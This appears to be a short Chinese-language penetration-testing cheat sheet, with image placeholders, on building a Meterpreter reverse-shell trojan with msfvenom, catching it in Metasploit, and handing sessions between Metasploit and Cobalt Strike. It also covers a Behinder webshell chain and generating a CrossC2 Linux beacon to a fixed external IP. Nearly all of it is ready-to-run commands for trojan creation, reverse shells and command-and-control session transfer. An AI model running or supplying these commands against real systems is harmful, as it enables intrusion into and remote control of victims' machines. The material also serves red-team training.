1、MSF生成木马
https://www.cnblogs.com/bmjoker/p/10051014.html
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
linux木马工具 https://github.com/gloxec/CrossC2/blob/cs4.1/README_zh_full.md
image.png
将木马上传至靶机
2、msf控制木马
启用msf:msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 1234
image.png
image.png
run
image.png
3、靶机端木马执行
image.png
4、msf控制端获取靶机信息
image.png
5、CS端配置新的监听
注意payload是http协议
image.png
6、msf控制端启用bg
background
image.png
启用payload_inject模块
use exploit/windows/local/payload_inject
image.png
7、msf端配置设置payload
set payload windows/meterpreter/reverse_http
image.png
8、msf端配置设置IP和端口
set lhost 192.168.1.5
set lport 6666
image.png
8、将session 1 转给cs端
image.png
8、CS端看到靶机信息
image.png
9、CS->MSF
MSF监听:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 3344
run
CS:spawn 监听器
监听器:windows/foreign/reverse_http msf_IP msf_端口
10、冰蝎->MSF->CS
https://github.com/rebeyond/Behinder/releases/
#后渗透CS-CrossC2上线Linux主机
https://github.com/gloxec/CrossC2/
1.自己生成:
./genCrossC2.Linux 47.242.218.253 6666 null null Linux x64 test
2.配置插件生成:https://www.cnblogs.com/xuanlvsec/p/14240479.html